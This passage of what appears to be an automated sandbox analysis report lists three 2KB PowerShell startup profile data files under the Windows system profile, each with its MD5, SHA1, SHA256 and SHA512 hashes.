SHA51203c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize2KB
MD5b899207441c0301bb017e3141d12fbd0
SHA14f7811f37267e498fe5cf0b492aaebb906ac5e2a
SHA25673ea7a0773a42b5d698bcaded17c028c28a8a4c9be070aefc870665668a55200
SHA5121ee8f058888566de059adf051dfda5d9468fa5b90219aff996e151759184cfefd0f91261fdf70aa8deb9359555e163da35402f058daf35093a6867256090abd2
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize2KB
MD51aefd4e1f3dfe890fbcf171751fdcfb8
SHA126cf4c0aedac08f6c93802de131525225d4beafb
SHA256dd500bed55924736b3a1801d703f0e3949d24207d7616f6f51a9af9e5215aa79
SHA512599e07fff6e798578d074e635da379df141e676ebc4ece02de01e17fa9f98772fd7956ff79885eb9861869aa52bfb9f9f32b6de3b817dede0fc2d8d1de228ca1
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize2KB
MD5dc9c781fb91cfdd8f626df71d07fc835
SHA19eddb67b260c30a15a7ee062d6e034e17bb70566
SHA25617abfa2e3523b2dc3f3385003c9b934aeea60b1ed60e12fbba7542152d8baa18
SHA5122bcbbb5afc6e188a60300d6d816bd2e6800721be90201387f9303dcda3fb983ac4b696f1e6624031b17f8ac6b6f0d8d5b4e5d16c5b0d6f9373c411632b9f5366